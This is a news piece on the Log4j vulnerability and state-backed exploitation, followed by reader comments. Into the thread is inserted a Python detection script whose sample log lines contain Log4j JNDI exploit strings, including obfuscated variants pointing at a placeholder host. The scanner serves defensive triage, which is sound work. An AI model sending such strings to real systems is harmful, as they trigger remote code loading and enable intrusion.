As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to …

  1. JohnSheeran

    This certainly looks like the worst I've seen in my career. There is already so much said about it but the amount of time and money this is going to cost us is hard to imagine.

  2. Anonymous Coward
    Childcatcher

    Shit show

    Most of my webby stuff is behind HAProxy. I put in a rule to block most naive JNDI-type GETs after normalisation - they go to a tarpit. I've seen a few requests per day. Perhaps if you look a bit crap and sad then you drop off the radar.

    One was quite persistent and looked like a security research effort (I can't be arsed to follow up). Another is really sad and clearly has a bug or two in their code. The GET tries to create a URL with ${hostName} in it, so they've got their quoting etc. screwed up. Another makes the same mistake as the last, but the URL is repeated several times in a weird nesting bug.

    The clever kids will no doubt be causing some harm in the near future but there are some comical efforts from the skiddies too.
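The commenter's HAProxy rule blocks "naive" JNDI-type GETs only after normalisation, and that normalisation step is where such filters usually fail. The Python below is an added example, not the commenter's configuration or any project's code: it percent-decodes (repeatedly), lowercases, and collapses the simple `${lower:x}` / `${x:-y}` wrappers that otherwise hide the `${jndi:` token, then runs the check over constructed access-log lines. The IP addresses, the `.invalid` hostnames and the function names are all made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style). Addresses and
# hostnames are synthetic (.invalid TLD); nothing here is real traffic.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Dec/2021:10:01:03 +0000] "GET /?q=${jndi:ldap://lookup.example.invalid/a} HTTP/1.1" 200 512 "-" "curl/7.68"',
    '10.0.0.7 - - [12/Dec/2021:10:01:04 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Flookup.example.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.8 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://lookup.example.invalid/c}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:06 +0000] "GET /?u=${hostName} HTTP/1.1" 200 512 "-" "-"',
]

_PERCENT = re.compile(r"%[0-9a-fA-F]{2}")
# ${lower:x} / ${upper:x} -> x  (the text is already lowercased by the time this runs)
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}")
# ${anything:-x} -> x, which also covers the degenerate ${::-x} form
_DEFAULT_WRAPPER = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")
_JNDI = re.compile(r"\$\{jndi:")
MAX_ROUNDS = 5  # bound the decode/unwrap loops so hostile input cannot spin them


def normalise(text: str) -> str:
    """Fold a request string into a canonical form before matching."""
    for _ in range(MAX_ROUNDS):  # undo (possibly repeated) percent-encoding
        if not _PERCENT.search(text):
            break
        text = unquote(text)
    text = text.lower()
    for _ in range(MAX_ROUNDS):  # peel simple lookup wrappers from the inside out
        folded = _DEFAULT_WRAPPER.sub(r"\1", _CASE_WRAPPER.sub(r"\1", text))
        if folded == text:
            break
        text = folded
    return text


def is_jndi_lookup(text: str) -> bool:
    """True when the normalised text still contains a ${jndi: lookup."""
    return _JNDI.search(normalise(text)) is not None


def scan_log(lines):
    """Return the log lines that carry a JNDI lookup anywhere in the line."""
    return [line for line in lines if is_jndi_lookup(line)]


def hits_by_client(lines):
    """Count flagged lines per source address (first field of the log line)."""
    counts = {}
    for line in scan_log(lines):
        ip = line.split(" ", 1)[0]
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for line in scan_log(SAMPLE_LOG_LINES):
        print("JNDI lookup attempt:", line)
    print(hits_by_client(SAMPLE_LOG_LINES))
```

The plain, percent-encoded and `${lower:j}`-wrapped forms all match once normalised; the last sample line, with a bare `${hostName}` and no JNDI lookup, is the kind of malformed request the comment describes and is not flagged. The wrapper set here is deliberately small, so the matcher is a logging and triage aid at the proxy, not a substitute for upgrading Log4j itself.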

    1. analoguecomputer

      Re: Shit show

      Blocking "most" "kids and skiddies" sounds like a really good strategy. The problem with Infosec is people just get "arsed" a bit much.

      Do you give lectures? This sounds like a really efficient and cost-effective approach!

      Is this UK-GCHQ inspired? Have you worked for the NHS?

      Get back to us if ever nation states decide to hire grown-arsed adults as part of their cyber offensive strategy!

      1. Anonymous Coward
        Childcatcher

        Re: Shit show

        "Get back to us if ever nation states" - that's the clever kids I refer to.

        The great thing about running everything inbound www through a proxy is you get to see all sorts of things. I've only given a flavour here. No, of course that's not my sole strategy and I'm just a simple sysadmin.

        I have worked for and on behalf of some quite interesting organisations.

  3. Anonymous Coward
    Anonymous Coward

    "the US government's Cybersecurity and Infrastructure Security Agency tells all federal civilian agencies to take care of CVE-2021-44228 by December 24, 2021. That's quite a tight deadline."

    Tight? Only by government standards. I think our deadline was today.

    1. Yet Another Anonymous coward

      You managed to generate all the PowerPoints necessary to launch a cross-department liaison office with a mandate to discuss ways of formulating a policy to respond to this - in only one day?

      We have barely gathered all the logo images of the stakeholders for the title page.

  4. Anonymous Coward
    Anonymous Coward

    Jokers, Java sprawl mopped up in a few days across hundreds of thousands of devices. You're having a laugh.

    Just installing a later version of Java can take weeks of testing...

  5. batfink

    Them and everyone else

    Why is it that I find it hard to believe it's only the TLAs of Russia, China and Turkey actively exploiting this?

    If the others aren't, then they're falling down on their jobs.

    1. MrDamage

      Re: Them and everyone else

      Because as soon as news of this hole got out, they stopped using it and went on to the next one on their list.

        1. Yet Another Anonymous coward

        Re: Them and everyone else

        I'm a little out of the loop - my Vidiscreen has been broken.

        Is that Turkey, our staunch NATO ally in the war against the Kurds who are responsible for maintaining all our new F35s?

        Or have we always been at war with Eurasia?

  6. martinusher

    ...and I suppose the Axis of Evil doesn't use web browsers?

    Says it all, really.

    This bug cuts across nations. We might want to ponder why our pols and pundits seem to think that "the usual suspects" will immediately exploit it without it being immediately exploited against them. (As a ransomware delivery tool the answer's obvious -- like bank robbers you go where the money is.)
